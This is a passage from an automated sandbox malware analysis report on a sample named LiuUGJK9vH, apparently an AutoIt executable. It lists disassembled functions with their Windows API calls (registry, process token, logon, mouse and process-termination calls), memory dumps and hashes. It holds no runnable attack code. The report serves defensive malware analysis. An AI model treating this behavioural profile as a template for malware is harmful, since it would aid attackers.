                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$__itow__swprintf
                      • String ID:
                      • API String ID: 3253778849-0
                      • Opcode ID: 8cbfe9821565179410f19b525838424f4bfd1a05df102c2ca956a903836ec576
                      • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                      • Opcode Fuzzy Hash: 8cbfe9821565179410f19b525838424f4bfd1a05df102c2ca956a903836ec576
                      • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                      Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                      • String ID:
                      • API String ID: 4046560759-0
                      • Opcode ID: 163d3c4affa51dac83ce02df1c8336ece114573e68c7f47e9183a6863d30b492
                      • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                      • Opcode Fuzzy Hash: 163d3c4affa51dac83ce02df1c8336ece114573e68c7f47e9183a6863d30b492
                      • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                      Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0045EF06
                      • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                      • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                      • _memmove.LIBCMT ref: 0045EFFD
                      • VariantClear.OLEAUT32(?), ref: 0045F04A
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType_memmove
                      • String ID:
                      • API String ID: 1101466143-0
                      • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                      • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                      • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                      • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                      Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00462258
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                      • IsMenu.USER32(00000000), ref: 004622C3
                      • CreatePopupMenu.USER32 ref: 004622F7
                      • GetMenuItemCount.USER32(000000FF), ref: 00462355
                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                      • String ID:
                      • API String ID: 3311875123-0
                      • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                      • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                      • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                      • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                      Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                        • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                      • GetDesktopWindow.USER32 ref: 004770D6
                      • GetWindowRect.USER32(00000000), ref: 004770DD
                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                        • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                      • GetCursorPos.USER32(?), ref: 0047713B
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                      • String ID:
                      • API String ID: 4137160315-0
                      • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                      • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                      • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                      • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                      Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                        • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                        • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                        • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                        • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                      • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                      • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                      • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                      • HeapFree.KERNEL32(00000000), ref: 00458911
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                      • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                      • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                      • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                      Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                      • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                      • CloseHandle.KERNEL32(00000004), ref: 00458603
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                      • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                      • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                      • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                      Function 02F9185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: ec9ab533e69af6e14dd705bc0aa0ce4241f45d05ec8671b7253d53fe0246ef88
                      • Instruction ID: b9a88f2fa9e3e6caa7d80e4debbb9f9d7c293f25dab5d54d589b79140e592211
                      • Opcode Fuzzy Hash: ec9ab533e69af6e14dd705bc0aa0ce4241f45d05ec8671b7253d53fe0246ef88
                      • Instruction Fuzzy Hash: 47F0F43698060636FF122736AC08F2B32579BC1BE1B240634FB1D92290EF6288169910
                      Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                      • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                      • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                      • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                      Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                      • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                      • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                      • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                      • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                      Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                      • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                      • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                        • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                      • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                      • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                      • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                      • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                      Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                      • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                      • CloseHandle.KERNEL32(?), ref: 004589B2
                      • CloseHandle.KERNEL32(?), ref: 004589BA
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                      • HeapFree.KERNEL32(00000000), ref: 004589CA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                      • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                      • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                      • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                      Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                      Download Yara Rule
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                      • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                      • _memcmp.LIBCMT ref: 00457748
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID: ,,I
                      • API String ID: 314563124-4163367948
                      • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                      • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                      • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                      • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                      Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00478613
                      • CharUpperBuffW.USER32(?,?), ref: 00478722
                      • VariantClear.OLEAUT32(?), ref: 0047889A
                        • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                        • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                        • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
                      • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                      • Opcode Fuzzy Hash: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
                      • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                      Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                      • _memset.LIBCMT ref: 00462B87
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
